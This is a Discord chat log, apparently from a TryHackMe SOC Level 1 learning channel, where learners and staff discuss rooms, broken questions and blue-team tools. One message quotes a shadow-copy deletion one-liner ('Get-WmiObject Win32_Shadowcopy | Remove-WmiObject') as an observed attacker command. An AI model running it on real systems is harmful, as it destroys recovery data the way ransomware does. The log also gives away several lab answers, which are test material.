#soc-level-1-path

happy to hear
I do not have to do then things over

@native viper any idea if there is much changed ??

Thanks for the answer

Gave +1 Rep to @native viper (current: #928 - 7)

A whole lotta stuff was changed and it’s cool! It focuses on pure SOC activities now rather than the old rooms explaining tools you might never touch as a soc analyst

Nice to hear

Is the "Cold Start" event already on?
https://www.linkedin.com/posts/tryhackme_the-cold-start-1-day-to-go-activity-7416170043815657472-DMAM/

I cannot find it

Hello I have a question, If I start the Soc Level 1 am I automatically entered in the giveaway? Or do I need to finish the whole course? (I really want that free sal1 exam pass)

nvm im dumb its 1 ticket per room again

hmm page not found

Can anyone help me figure out why xxx.xxx.xxx.103 is here the answer

I would say .104 should be the answer

Chips, here are tickets for rooms I already did 🙁

@dull swallow must I do the rooms again for the tickets that I already done ??

try this:

oke, thanks

frustating subject this way

@eternal moon did you also find the wireshark challenges very hard or is it just me ??

well... they are specific in some way, challenging i would say 🙂

for sure challenging
It causes me real headache after 1 - 2 hours work with wireshark

well, i've already encounter much worst rooms, but if you make few wireshark rooms it will be easier 🙂

oke, What did you find one of the most worst rooms then/

try HoloLive 🙂

is this a SOC challenge ??

https://tryhackme.com/room/hololive

not for me.

First finish this course and do a lot of beginners challenges here

If you haven’t seen the announcement, check it out here - #announcements message

oke, so I need to do some challenges again to earn the certificates ?? @proper meteor @dull swallow

Yep, looks like you do according to this slide

Then I do not know if this challenge is for me
Im still busy with some chapters of this level and im around 45 - 50%

There's time until end of day 25th January UK time, you can do it. Also you don't have to redo everything, only some of the rooms give you tickets

Rooms have a ticket next to it in the SOC Level 1 path

https://tenor.com/view/friends-chandler-joey-good-job-great-job-gif-14365146578827875022

oke

maybe in 2 weeks I can come till the windows or linux security monitoring

Highly recommend to anybody currently in the SOCL1 path! 🙂 https://discord.com/channels/521382216299839518/1460315980428214303

maybe a stupid question

But im studying on 2 different places
Could github be a good place for my notes or is there a better place ?

Obsidian works great as note-taking software

It offers plenty of possibilities and customizations

oke, then I have to install it on 2 places ??

That will be a problem because I cannot install software on my work computer

Hey my apologizes for the late respond but the tcp.window is for setting how how data can be transmitted in a data packet before bing acknowledged.

You can use web-based notetaking app like https://app.notesnook.com/notes/ which you can access through a web browser. No sofware installation needed.
There are various payment plans, so choose a plan according to your needs.

try out notion. great web app and you can download the desktop app at home 🙂

Thanks everyone
I will take a look

In SOC Roles in Blue Team room during task 5 "Final challange" you have that websity task to put good people in good spots. But it literally shows you good answer by either coloring in red or green when you grab someone and hover above answer. Is that intended?

Do i understand correctly that finished rooms don't count for tickets? I have to reset and retake them to earn the credits?

Yeah that's what rules says

In SOC Level 1, SOC Team Internals, SOC Metrics and Objectives, thez covered terms such as MTTD,MTTA,MTTR:
Imagine a scenario where an employee was lured into running data stealer malware.

The SOC team received the "Connection to Redline Stealer C2" alert after 12 minutes.
One of the L1 analysts on shift moved the alert to In Progress 10 minutes later.
After 6 minutes, the alert was escalated to L2, who spent 35 minutes cleaning the malware.
Provide the MTTD, MTTA, and MTTR via comma as your answer (e.g. 10,20,30).
My answer was : 12,10,41
My thought Process:
SOC Received alert afer 12 minutes after the malware started running which means MTTD = 12 L1 Analyst moves alert to in Progress after 10 minutes MTTA = 10 L1 Analyst then takes 6 minutes to escalte alert to L2 which becomes an Internal Process L2 Analyst then takes 35 minutes in clearing the malware MTTR = 6 + 35 = 41 Final Answer(MTTD,MTTA,MTTR) = 12,10,41

ANSWER IS INCORRECT?
How? and Whats the answer?

Question to those, who completed IP and Domain Threat Intel room. Do DNS check give results for you? Can't proceed in room without checking write-ups. Although method is the same as I use, I can't get any result

(MTTD,MTTA,MTTR) = 12,10,41
Check again what these metrics correspond to, MTTR is not only 41 minutes for exaple

Had the same issue, just followed a guide

Did the same although knew the methodology

thanks though

some one soc from uk guys ? i

no idea, im from the Netherlands

I'm getting tired of these machines getting terminated all of a sudden

Maybe try reporting at support@tryhackme.com , I have the same issue

yeah there is a link to the help site that pops ups but I'm just tired of it happening repeatedly

someone soc from arg?

was this a pretty good prep path? it lead to a job for anyone?

I'm just starting out, beginning with the SOC Team Internals section. It's helping me get a general overview of what a SOC analyst does. But I haven't been able to get a job yet.

Hello I seem to encounter a problem in the room: investigatingwithelk101. The "vpn_connections" logs is empty

has anyone done the soc L1 alert reporting task 4? My question 2 does not fit the flag the soc dashboard is giving me.

@twilit trout @solid nest could you share screenshots?

dont have it open anymore :C but i found the answer in a different room. didnt fully get why some poeple got that one and some of us got the one i got which says faking microsoft support. the other one said good job escalating alert or something along those lines

There are like 2 or 3 flags and they are sequenced

But I’m glad you were able to get it

what that mean? i tried changing what i picked in the tabs just incase that changed the outcome but it gave me same in all combos

The alert in those rooms were to be taken based on severity.. so the first one would be the one with highest severity (critical) and the next would be lower (high -> medium -> low)

yeah thats the order i did them in, iguess itmight have been cuz i restarted it a couple times xD

I finished the room and just forgot to set the filter, tysm for the concern! 🙂

guys i have completed some rooms for SOC L1 which have the ticket what to do in that situation? reset the progress?

Reset the progress of only those rooms which display a picture of a ticket .

Is there a problem with the site.
When I try to open the roadmap I get a message that the page cannot be loaded

What is wrong with this snort rule :

alert tcp any any <> any any (msg:"PUSH ACK"; flags:P;sid:1000001;rev:1;)

to find the answer to this question

Clear the previous alert file and comment out the old rules. Write a rule to filter packets with Push-Ack flags and run it against the given pcap file. What is the number of detected packets?

Hey guys, can I start directly with an L1 SoC with some knowledge of networking, Linux and Windows?

I would not do it

For anyone still doing SOC Metrics and Objectives make sure you look at the diagram they provide it shows you how to calculate the numbers up. spent way too long before i realized it was right in front of me.

Ill echo @vocal mesa Id recommend learning some more fundamentals first, but you dont NEED to. I have started my own cyber career journey about a year and a half ago. There are a lot of fundamentals that will help you immensely, I did have 15 years of network and tech hobby. but it still took me about a year to reach the level of knowledge (and recall for that matter too) where i feel i can constantly move room to room without getting stuck. Fundamentals are the backbone of anything cyber and they are transferable skills.
But that can be not much fun so here is something i learned when i started: If the topic you are curious in is complex check the intro to that room they often say what prerequisites are required . Just brush up on those rooms and have them ready to reference forums, ai(echo included), and the community tutorials (youtube has a ton). If you get stuck follow along. I am someone who prefers to get in over my head then figure it out the hard way.
If you are tech savvy you could attempt the SOC L1 Cold Start, no penalty for trying and you may get further than you think. A lot of it is tutorial to start with (although those kinda expect you to know a bit of the basics).
To be very clear im talking cold start and not the certification. I do not recommend jumping right into that without some good background.

whats this about now?

Hi guys,
New here. Learning SOC since last 6 months but made progress from last 1 months. Looking forward to get experience and learnings from you all!

#announcements message

If somebody has already completed a room in SOC L1 path, they need to reset the room and complete it again to gain a ticket for raffle.

bummer

mid path or only prior to this competition?

I have a verify/display issue with my SOC Level 1 Certificate. I completed the Legacy SOC Level 1 path on August 29 (89 hours). I recently completed the New SOC Level 1 path yesterday (65 hours). However, when I download my certificate for the new path, it is still generating the certificate with the old date (Aug 29) and the old hour count (89 hours). In which channel should I post this problem?

a question about the windows logging rooms
How can I do the search step in event viewer :

Analyse Process Activities (Expand Me)

    Copy the ProcessId field from the event ID 1
    Search for other Sysmon events with the same ProcessId

IM talking about this room:

https://tryhackme.com/room/windowsloggingforsoc

Hello, i was doing Wireshark room and was stuck on Decrypt the traffic question. i have added the KeylogsFile.txt in wireshark TLS protocol. and When i am searching for http2 packets, i don't see any on the screen.

• Tried Reloading The pcap file
• Tried Reopening Wireshark
• Tried Restarting Attackbox

Add the keys to the last field "(Pre)-Master-Secret log filename"

oh shoot! my bad

Someone who can help me with my problem ??

yeah?

I ask earlier

but I can ask again

sorry buddy! i am not there yet.

totally not a problem

i was actually doing SOC L1 path. but it got revamped after. so i am doing multiple new rooms rn.

oke, and my room is about 60%

Try your hard first. then ask somebody then Check the writeup. easy

but as I said , totally not a problem that you cannot help me
This was more for everyone instead of just you

or watch a YT Video. i am sure there will be someone who was explaning this topics alongside with completing the room.

I already look at some writeups but they gave a answer . Not how they found a answer
And that for me is the most important part

search a YT Video of this room then.

or ask any AI model

You can use the 'find' button in Event Viewer

It's on the right menu, under the filter current log and properties

oke, and I "have" to put the processid into that field

I can try it

Yeah, that will work

moment, the attackbox is now booting

box is slow

You mean target box?

AttackBoxes are terrible when it comes to performance, better to virtualize your own 😄

I tried but kali linux makes me more crazy

but I found the answer

Why is that?

Some things are in my opion on a wierd place

You can always customize it, long-term you will benefit on using Kali or some other distro in general

oke

for now I have to think how to solve this one :

What is the Command & Control server malware connected to?
(Answer in format IP:Port, e.g. 1.1.1.1:80)

With the find you can now do it easily, good luck 😄

Thanks

solved both

and windows logging done
Tommorow time for Windows Threath detection 1

#announcements message

The team had been building this CTF for a while and now we're delighted to be able to release it. A pure blue CTF focused on the skills learned in the SOC L1 path. Play for prizes or play for fun, I hope you enjoy the challenge!

@proper meteor is this challenge also do-able when you still busy and are on the first part(25%) ?

The Windows Security Monitoring room is so extraordinary! Thank you TryHackMe!

Hey @vocal mesa, The topics will cover multiple modules across the whole path so if you have not no knowledge on some topics yet it may be a challenge. However, the team did try to build this so there are layers of difficulty so there would be something for everyone. Up to you but nothing really to loose to give it a go, should be some good learnings in it. Win or learn!

You last remark do remind me about a remark on the sportshool my wife is going

you never loose. Or you win or you learn

🙂 Love it

me too

and the older I get , the more I see it is a very good one

@fast prairie deserves a all the credit for this module, its a great one 👏

no idea if I already did that one
im still at Windows Threath decision 2 room

@proper meteor maybe a new career in security at 60

Great work @fast prairie 👏

Good night guys, anyone can tell if are some bug in the first level of the site?

I'm trying to step foward the third task of the introduction

Is talking about the dirbuster, about the second ocult url, i'm awsner right, and is not working

After some time, I finally complete. Thank you!!

Hello I would like to report an error in room https://tryhackme.com/room/wiresharktrafficanalysis
ARP Poisoning & Man In The Middle! question 3. I don't find the same number requested it's still 1 digit but I don't have the same number within the same pcap. If I am wrong, someone can explain to me my error?

NEVERMIND I just understand it when checking the packets

my bad

🙂

Hello everyone, I want to practice SOC events and documenting them for Interviews.

Someone knows the best way to do it ?

Hello, in the room https://tryhackme.com/room/fileandhashthreatintel, task 4. There's a question "Which other process was spawned according to the process tree?"
I couldn't find anything that would be correct either on VirusTotal or Hybrid-Analysis so I checked a walkthrough. Can someone help me understand where is the answer ||werfault.exe|| for file with SHA256 ||2672B6688D7B32A90F9153D2FF607D6801E6CBDE61F509ED36D0450745998D58|| coming from? I'm completely lost. Even tried to ctrl+f this file on both sites and I couldn't find anything

Hmm I guess it's just a bit outdated, spotted two more weird answers

I'll pass that on to the team to see if we can figure this out. I know this room in the past had some issues where the Threat intelligence sites that was used updated the reports and so some questions broke. 😥

Thx

Gave +1 Rep to @proper meteor (current: #253 - 40)

you mentioned there are two other questions that had weird answers also. are they all in the same task? (task4)

Same room but I think it was task afterwards. I can give you more details in around 2h

Same room, task 5:
What PowerShell script is observed to be executed?

The correct answer is:
||Get-WmiObject Win32_Shadowcopy | Remove-WmiObject||
However this is misleading as it's not a script, it's a cmdlet or rather an one-liner.

What is the MITRE ATT&CK ID associated with this execution?
And the correct answer: ||T1490||

Shouldn't it be ||T1059||? Win32_Shadowcopy might be related to the correct answer but the question is about PowerShell execution (?)

You're right about the PowerShell script question; it would be more accurate to rephrase it as a command.

For the second part, the question targets the actions associated with the command, not PowerShell, which is why the latter wasn't set as the correct answer. The questions shall be rephrased to avoid ambiguity. Thanks for the feedback 🙂

Gave +1 Rep to @fickle flare (current: #466 - 17)

hello,in the room https://tryhackme.com/room/investigatingwithelk101 ,task 5, there is a question "Create a search query to filter the logs where Source_Country is the United States and show logs from User James or Albert. How many records were returned?"

The result I got is 101, and it says it's wrong.

This is what I wrote, is there anything wrong with it?
Source_Country : "United States" and ("Albert" or "james" )

I solved it, it came out to 161. The problem was that there were two employees named James, one with a capital J and the other with a lowercase J.

In soc jobs or internships, which is more common remote work or offline work?

Hi, maybe it's a stupid question but I'm a bit surprised with the Introduction to phishing SOC Simulation scenario positioned at the end of the SOC Team internals chapter of the SOC L1 path. This simulation scenario info says it takes only around 10min to finish it, but when I'm looking at the playbook it seems that it would take me much much more time at the level where I am at in the SOC L1 path. Splunk and other techniques that I need to use are only learned in the subsequent chapters. So my question is: Am I missing something? Overthinking this simulation? Or did you guys kept going with the rest of the learning path chapter by chapter then only at the end worked on the SOC simulation scenario?

hi Quick question
I’ve been building a home lab using two laptops, and even though things are running, I’m feeling a bit lost about what I should do next to properly learn and progress as a SOC analyst, so I wanted to ask if there’s anything that can guide me on what to focus on now, what skills or scenarios to practice, and how to move forward from here.
https://x.com/SBE10OC/status/2010367164121850174
Appreciate any advice

Hey, don't know if this is the right area in the discord to ask this, I'm quite new to this platform. I've been recently going through the SOC Level 1 path on TryHackMe and I've come to the Snapped Phish-ing Line Room challenge. Prior to reaching this room the material I was reading felt like it was sinking in and making sense and when I've got to this room, part of me is feeling like did I even come across this before. Is there more things I should be doing prior to these type of rooms that are challenges? Did any of you feel the same way? Apologies for the long message but any help would be appreciated.

whats this?

With the Linux Threath detection room task 5 How do I find this answer

Which command did the attacker use to list the last logged-in users?

You could try

sudo systemctl status auditd

&

sudo ausearch -x /bin/bash
sudo aureport -x

If that doesn’t work you could try this.

journalctl
journalctl _UID=1000
journalctl -u ssh

Not done this room myself so not entirely sure on if this will get you the answer but fingers crossed 🤞

thanks

You can view this as your first experience working in a SOC, alerts coming in SIEM investigations. maybe you don't have all the information you need to close the alerts. it's less important that you nail this and find it easy. it's more important that this stretches yourself and maybe opens your eyes a little bit in terms of what's needed over the coming modules. You don't need to pass it successfully to move on to the next module. just view it as an experience. do your best.

This is a very individual question, it depends on where you are starting out. There are lots of core concepts and understandings to learn that you can learn without a home lab. I'm saying this but I'm a really big fan of people having some type of home lab that they can set up, break, test ( learnt a huge amount myself that way).

If however you don't yet know what you want to build then probably the focus should be on a structured learning like our SOC Level 1 path. There maybe time going through this that you think you want to dig deeper on a certain concept that you can't do in the room or VM provided, then that would be a great first thing to build.

That is part of a ticketing event that has been run on the platform for the SOC L1 path, I think its over now or nearly over. Maybe your one ticket wins a prize! 😄

Thank you for your reply. It makes sense now.

Gave +1 Rep to @proper meteor (current: #251 - 41)

hello does the soc simulator rooms that require thm buisness count for path completion ?

Hey guys i'm currently making write-ups for some of the rooms in the SOC1 path so I can put them on my portfolio to send to employers, but I'm struggling with a format for the SOC simulators - it seems like any way I do this theres a lot of bloat in the way of screenshots or alert repetition and I was wondering if anyone had any ideas?

I am not sure if there's a problem with this room for the SOC1 path but looking at writeups and comparing the answers to what I am actually seeing in the room doesn't look right.

Not sure if I am doing anything wrong or if there's a problem here that is beyond my scope.

https://tryhackme.com/room/ipanddomainthreatintel

The question

What is the country's name for the same IP address (64[.]31[.]63[.]194)?

Writeup says France but when I look at the IP lookup page, it only shows me the USA address so not sure what to do here.

I have been doing this yesterday and France is the correct answer. Make sure you actually provide the IP address in the correct format (without defanging)

Thanks I already figured that out and should have trusted my own instincts to do my own research

Gave +1 Rep to @fickle flare (current: #410 - 20)

Question to https://tryhackme.com/room/ipanddomainthreatintel
isn't question from task 7 outdated, wherever i searched the date is 16/01/2026

We are looking to update the task, as this is a case of the tools updating the data. I apologize for any frustration

Not frustrated at all, thank you for swift answer.😁

Gave +1 Rep to @hushed goblet (current: #285 - 36)

Hey all, did anyone do the recent CTF we ran last weekend first-shift-ctf?

Just looking for some input from you all. the CTF was built based on the topics within the SOC level 1 path. we're considering if we should reuse the challenges and add it to the existing path for learning. Either break it up into individual rooms and include it in a module maybe right at the end or distribute it throughout the path as challenges you face along the way.

we're a little concerned that might make the path too long by putting these additional challenges in it because it already has capstone challenges.

anyone have any strong opinions either way?

I haven't tried that CTF. But I would be super glad if we can have more CTFs in the rooms as a learning process. While some may care more about speed of completing the module, I do care more about the knowledge gained (these are things that will give us advantages while trying to get a job)

Add challenges to any Learning path as and when you all feel it will be a good practise.
Also remove challenges you all feel are no longer relevent or good enough.

Why is the Blackcat room included in the SOC path if it’s not accessible with a premium account? Seems to be a business account only feature. Am I missing something? For context it’s the last room in the Linux Security Monitoring section

You are not missing anything. Unfortunately the business rooms are included in the regular paths.

Bummer, what a tease. Thanks for validating tho!

Gave +1 Rep to @fickle flare (current: #397 - 21)

Anyone available to mentor/guide me briefly on SOC career steps and resume improvements? I’d really appreciate feedback

https://github.com/Sp41zyyxx/Write-Up-SOC1/blob/main/Boogeyman 1 BOOGEYMAN 1 SOC1 WRITEUP

Just finished the whole SOC Level 1 path. It was fun! I enjoyed the challenges the most, Boogeyman was great

I’m 96% done with my SOC 1 course and I want to ask a question.
Are “Hidden Hook” and “Open Door” paid rooms?
Do I need to pay extra to access those rooms, or are they included in the monthly subscription?

anyone ?

congrats!! there were a few challenges that required business sub. Does that affect the path completion?

No, they are not affecting it

@atomic pendant they are extra paid for business users

Thanks!

MY WRITEUPS IF ANYONE NEED IT
https://github.com/Sp41zyyxx/Write-Up-SOC1/blob/main/Boogeyman 1 BOOGEYMAN 1 SOC1 WRITEUP
https://github.com/Sp41zyyxx/Write-Up-SOC1/blob/main/Boogeyman2 BOOGEYMAN 2 SOC1 WRITEUP

Hii

Imo it's lacking explanation how did you get to the answers.
I don't find such writeups useful for myself

Fair point — the writeup focuses more on the investigation steps than the reasoning behind them.
I’m working on adding more context to explain why each technique was used.

If you need any assistance, please do not hesitate to contact me.

can someone help me out with this question "What is the website for the - CLICK HERE URL in a defanged format? (e.g. https://website.thm)" ive exhausted all resources followed all steps even got the right answer but its seems the quesiton is broken https://tryhackme.com/room/phishingemails1tryoe

did you defang the URL?

yes in Cyberchef and CMD

In cyberchef with "from base64" and | base64 in CMD... I can show you the answers i got both formats neither works

Why base64 and CMD? You just have to provide the defanged domain

thats all you need to do

echo" This will output the Base64 encoded version of the URL. You can then use this encoded string in your CyberChef recipe. If you want to decode it back, you can use the From Base64 operation in CyberChef.

If you need further assistance with this process or have any other questions, feel free to ask!

aHR0cHM6Ly90LnRlY2tiZS5jb20= i input this with command and the answer that came back https://t.teckbe.com

User avatar
Echo
Great! You've successfully decoded the Base64 string aHR0cHM6Ly90LnRlY2tiZS5jb20= to get the URL https://t.teckbe.com. This URL appears to be the one associated with the 'CLICK HERE' link you were analyzing. If you need to include it in your report or responses, you can use the defanged format as hxxps://t[.]teckbe[.]com to avoid accidental clicks. Let me know if you need help with anything else related to your task or further analysis!"

Echo... is shit. Although it provided you the correct answer at the bottom.

💯

and its the same answer i got on my own that still doesnt work

ah, yea, it's missing some part. Just take that URL and put it into CyberChef as on the screenshot.

hxxps://t[.]teckbe[.]com doesnt fit marks as wrong

because it's not correct. Have you set recipe as on the screenshot? It's a default setup

i have id post screen shots if i could to show you. Then maybe i could know what im doing wrong

Verify your account #start-here , then you will be able to post screenshots

Really appreciate the help. I know it has to be user error this just stumped me

Now you need to add another recipe there - defang URL

saw your SS thank you

Gave +1 Rep to @fickle flare (current: #386 - 22)

You couldn't see screenshot without verification?

I could but i thought defang and decode were the same so zoomed in and saw defang

Ahh okay 🙂 gj

got it man thank you 🤙

hxxp[://]t[.]teckbe[.]com

Hello,

I’m experiencing an issue with Task 4, Question 2, where the platform does not appear to register or provide the correct flag after completing the task.

I have followed the required steps carefully and confirmed that the alert escalation and triage were completed correctly. However, the flag does not validate or update as expected.

To troubleshoot, I have already tried the following:
• Restarted the browser
• Tested using a different browser
• Logged out and logged back in
• Restarted the room/session where applicable

Despite these steps, the issue persists and no new or valid flag is generated for this task.

Could you please advise if this is a known issue or if there is an additional step I may be missing?

Which room?

SOC L1 Alert Reporting

Have you read and tried what is in the note?
Note: If you correctly escalated the alert earlier, just edit the alert and click "Save" again.

Yeah did that not sure can’t share picture either

You need to escalate the alert to L2, then edit the alert and save it

if you want to share screenshots you need to verify your account, it's described in #start-here

Anyone here done the Tempest room? Today for some reason, I started the first time and it is frozen. So I ended the instance and restarted it, still the same thing. Is it me or is there a problem with the machine? Yesterday it was working fine, albiet disconnecting every 20 minutes or so

I tried the RDP option and it was not letting me log in due to permissions not allowing me to do so...

@dull swallow

hi team, I am unable to shae screen shot even after verfing the account, could any one help please/

You should RDP from your VM (like Kali) into the Windows box, not from the split screen. It looks like you are trying to access the same machine.
You can also try opening the target box in full screen

Your account is not verified

No I tried to RDP from my windows machine using openvpn

Ok. It doesn't work from my Windows with OpenVPN either, probably has to do something with OpenVPN client configuration or firewall. From Kali it works without any issue.

EDIT: Nvm, it works. Give it more time to boot?

are you using the new openvpn config?

@fickle flare

Yeah but I assume you wanted to ping @vague cave

oh, right. my bad.

Yes I am

Can anybody help me with this question please.. What are the file’s contents in C:\Treasure\Hunt?

It's from Room Windows Command Line and task 4

The section describes which commands to list and display file content

http://github.com/Sp41zyyxx/Write-Up-SOC1/tree/main/SOC1 Capstone Challenges WRITEUP
Tempest
Boogeyman 1,2,3

Hi everyone! Having trouble on this path on "SIEM Triage for SOC" on "Log Analysis for SIEM" , the setup your virtual environment and start button do not work. Anyone had the same issue?

Hi @undone citrus, it is a new bug that was just reported to the product team. The fix should be available soon, and you will be able to launch the room as usual. Sorry for the inconvenience

Oh, thank you for the quick response! Thats god tier support right there 😄

Should work fine now 🙂

hey @fast prairie you're amazing! love your rooms and content!!

hey could i ask what is going on with phishing emails room? tasks are not well explained and some questions and answers are just stupid. worst made room after owasp so far for me

Anyone who can help me solve this :

3, 4, 2, 1... You first detect abnormal user agent -> then you identify the suspected attacker Ip -> then you go ahead to check the domain it's contacting -> then you get the full c2 URL

Thanks

This bugged me a long time

you're welcome!

I was all the time thinking and stuck On

First the ip , then the user agent, then the domain and then the full url

recap done 🙂

if you're working with thousands of logs, the odd user agent will stand out and help you triage faster

oke, still a lot to learn and to practice before I can become a good hobby analyst

Good morning bros and ladies ....can anybody help me with a question I've been stuck on this question for 3 days now?

Hey how did you post the screenshot because, I took a snapshot and it's not letting me upload my question?

Did you register on tryhackme on your profile ? @half raptor

Yeah from the website or on the discord? But website yes I did

so on your account-details you have a discord token ?

What does it look like?

a lot of numbers and characters mixed

Can a @mod or @staff take over this question ?

yeap??

Okay, its the Windows Command Line room and it's task 4

OEY

okey

1'

Yeah I've been having troubles finding it

First Step: cd C:\Treasure\Hunt
Second Step: dir
third step: type flag.txt
THM{*****}

if u have any questions, please let me know

Okay will do

Were you able to?

I'm a jump on it once I get out of this meeting & I'll let you know

Hey there! I'm having trouble with determining if someone clicked on a phishing link or not in Siem (splunk). I've watched many videos/tutorials but I can't seem to grasp THAT part. Could anyone explain?

You can search for HTTP requests (GET) using timestamps, user agents, and host names.

hi I am new here. I just met a crazy question after reading logs, the question was a friend that leaves an evidence on table is what? the answer is a five letter word. kindly help.

Room? Task?

yes please

SOC level 1

Room?

lab

yes sir

???

Which specific laboratory, so I can help you.

the question is under intro duction to logs. and question is, what is the name of your colleague who left a note on your desk?

can u send me url's lab please

idk which room r u talking

@teal steeple talks about https://tryhackme.com/room/introtologs

Perfect

click on your profile -> Manage Accounts -> Account details. Scroll down on ccount details and you'll find your token. Then copy your token and come back here. Type /verify and choose the verify bot then it'll prompt for your token so you paste it. Then you'll be able to paste screenshots and other stuff

Hi everybody. Please, be aware that the link to the introduction to EDR room is not working. Here is the link in question: https://tryhackme.com/room/introductiontoedr . It only show a blank page with the error: 'If this is an error on our behalf please contact us.'.

https://tryhackme.com/room/introductiontoedrs

try this one

Thanks. That one with the 's' at the end is working properly. Please, fix the link in the Linux Logging for SOC room (audit alternatives). The word EDRs in blue.

Gave +1 Rep to @fickle flare (current: #362 - 24)

@fast prairie

If anyone has any questions, please let me know

Hey @hasty gazelle @fickle flare, fixed, thank you!

Gave +1 Rep to @hasty gazelle (current: #1773 - 3)

Gave +1 Rep to @fickle flare (current: #357 - 25)

As a core user THM emailed me about my experience. in all honesty, you have started a great methodology to help garner new students to IT. The pre, and Cyber 101 courses are quite a good introduction. Soc1 (90%) through, tends to jump all over the place. The introduction of so many techniques, could baffle most users, and the use of a "league system" will just produce more analysts that have no idea what they are doing when it comes to an interview. I understand the need to make money, to keep this platform alive, but your challenge and league, carrot and stick learning approach will just create more undereducated; That have no chance in real in world institutions.

Eradication & Remediation WRITEUP
https://github.com/Sp41zyyxx/Write-Up-SOC1/blob/main/Modules/Incident Response/4. Eradication %26 Remediation.md

Hey sorry for the late response but I figured it out and I appreciate the help truly.

Well, that's good news. Let me know if you need anything

Yes sirrr

Appreciate all the feedback. i'm happy to take what's for me and my team and pass on what's for other teams.

1. • " Soc1 (90%) through, tends to jump all over the place" - would you be able to share a little bit more on what you'd have preferred? would you be happier with maybe a much longer path and spend a much slower time progressing two concepts? there's a lot of skills required for an l1 in a soc and the path attempts to prepare people for that. but it seems the pace of movement between subjects is too fast?
2. "league system" / "challenge and league, carrot and stick learning approach will just create more undereducated" - if you could maybe explain a little bit more about what you'd prefer or don't like about this I can pass it onto the right people. Motivating people to want to come back and learn seems like a good idea in theory but is your stance that this doesn't help people prepare for the real world?

Hey guys, how do i access recap topics ? i have seen an additional room there but i can't start it for some reason, i have completed all the previous room of it.

I could successfully access one of mine through the bell icon, top of screen. Maybe yours are still in the history shown there. Otherwise I was asking myself the same question and thought that it would require resetting one of the involved room to trigger the recap but I did have time to test my theory.

oh i see, but i don't have any new notification because i have completed this rooms previously when this feature was not added.

hello I need a modo because I have a bug in File and Hash Threat Intel room for task 4 4th question and I am pretty I am right the output is "Uh-oh! The answer you provided may not be in English. Please review it and try again." And yes the answer is not very English

can u send the url plase

https://tryhackme.com/room/fileandhashthreatintel

The payroll.pdf application seems to be masquerading as which known Windows file?

this one?

yes

which is ur answer?

svchost.dll

yeap

but remember

thaths a process

And what is the extension of a file with a process?

no.... exe?

ou only need to change the extension.

yeap

now? correct answer?

yeah thanks

let me know if u need any more

now im doing a write up, but if u need more explanation let me know

Okay thank you it was clear

I was just copy paste stupidly the answer 🙂

I would rather you think about it than give you the answer.

Hey, from talking with the team that built this, right now it works for rooms that you did after the launch of the feature but they are working on making it work for all rooms even if you did them prior to launch.

ok, thanks for informing.

Gave +1 Rep to @proper meteor (current: #243 - 44)

Write-up of the complete Incident Response module TRYHACKME
https://github.com/Sp41zyyxx/Write-Up-SOC1/tree/main/Modules/Incident Response

Someone can tell me if it's really possible to answer to https://tryhackme.com/room/ipanddomainthreatintel task 7 question 3 to 5 with the current santagift[.]shop or it's just me?

I don't want the answer only if it's possible to answer because I don't find something matching the answer

Looking back in my notes from last November, and how I got the answers, I would no longer have the expected results. So I do not think those questions can be solved right now.

thank you

I don't know if I can write that in the bug-report section if someone from THM Staff can help me? For the moment I do another room 🙂

You certainly can. In my experience, some bugs reported a long while ago are still not solved; I do not know why.
I'd suggest you to consult a walkthrough, no shame in that especially if you know you have the right methodology.

That's the duality of creating OSINT rooms: teaching about real internet tools is probably for the best learning experience, but OSINT data can change over time. They could create their own OSINT services in a VM/static website but that would not be the same experience, and definitively take dev more time.

Just to check with you @lyric sentinel , and be on the same page, I'd answer those questions with ||https://www.nslookup.io/domains/santagift.shop/dns-records/|| and ||https://www.whois.com/whois/santagift.shop|| . They could update the room's answers but that would only work for a while.

I just used dns history from https://completedns.com/dns-history/

so I found the right one but yes it' change a lot

yes it's not the answer because the one valid is ||ns-298.awsdns-37.com||

More complex, but I completed the room.

They started with a downloaded report in task 2, I wonder why they didnt do the same for the challenge

i am curious why is my machine and attackbox showing different result is this version issue or profile?

It can differ from Wireshark version, or it might be because of wireshark profile setting.

Thanks for this link! : https://completedns.com/dns-history/

Gave +1 Rep to @lyric sentinel (current: #3651 - 1)

The last question doesn't seem to accept the answer from completedns.com and it still doesn't accept the updated one from rdap

Hi everyone,

I’m currently testing a small DFIR scenario and ran into a performance issue.

I deployed the EICAR test file on a Windows test system and then collected artifacts using the Velociraptor Offline Collector.

After that, I created a Plaso database with log2timeline and uploaded it into Timesketch. Everything is running locally on my machine.

Here’s the problem:
• log2timeline took about 4 hours to complete.
• The resulting Plaso file is around 4GB.
• Indexing the file in Timesketch has already been running for more than 3 hours and is still not finished.

Is this normal behavior for a Plaso file of that size?

Does anyone know what might be causing this kind of delay?

Also, what would be a more efficient workflow in a real-world DFIR scenario? Waiting this long for timeline generation and indexing doesn’t seem very practical.

Are there better approaches or alternative tools you would recommend?

Thanks in advance!

Hi everybody. I am stuck in last question of task6 for the room 'Linux Detection 2'. I got several IP addresses using the ausearch and the file audit.log. None of them has only two digits in each component of the ip address (xx.yy.xx.y-xx.yy.xx.yy, according to the example). Has anybody got the proper reasoning to get to the answer for this one?

hey I finished my soc l1 path, do you guys think soc l2 is worth a go? I haven't had any real soc exeprience yet

can you elaborate a bit more?

I think you should take another look and look for ssh connectioins

Most of the rooms in SOC 2 path is less than 3 years old. Only 6-7 rooms are more than 3 years old.
So, yes, you can go ahead with SOC L2 path.
It would be better if TryHackMe refreshes all the Learning paths before they are 3 years old.

And remember to take notes along the way and redo some or all the rooms until you fully grasp their contents.

Thanks. I just got some help by searching at the 'Search TryHackMe' box at the top of this chat. I am now starting the room 'Linux Detection 3'.

Gave +1 Rep to @rugged seal (current: #1451 - 4)

how long did it take you to complete?

please am facing same problem, can you help me out or tell me the answer please, i cant get the flag

I am in the phishing analysis tools room. I want to solve phishing case 1. In general, am I not allowed to use web browser in the attack box of THM? because in the description of the task it says i should use the tools discussed in the sections before (e.g. Talos messageheader etc) but i cannot google anything

And i solved some tasks/questions by just clicking on the given eml file which is not the point i guess😂

You can calculate the hash of the file and search for that on your local machine

But yeah provided, you are right. Provided machine doesn't have Internet access. Instructions are a bit unclear

🙂

😅 so it was not my fault on my end

No 🙂

Open the notes, you can see who's sending the message below.

Thanks

Gave +1 Rep to @quasi bough (current: #1 - 6095)

hey ive been doing Snapped Phish-ing line and i have very mixed feelings about this room, like ||why flag is hashed and reversed? u need to guess a .zip page, one question is answered in the hint beacous it is outdated, task do not match knowledge given in walkthroughs before, why there are 5 mails when you only use 2, in question who is the recipient you need to guess which mail to choose ||

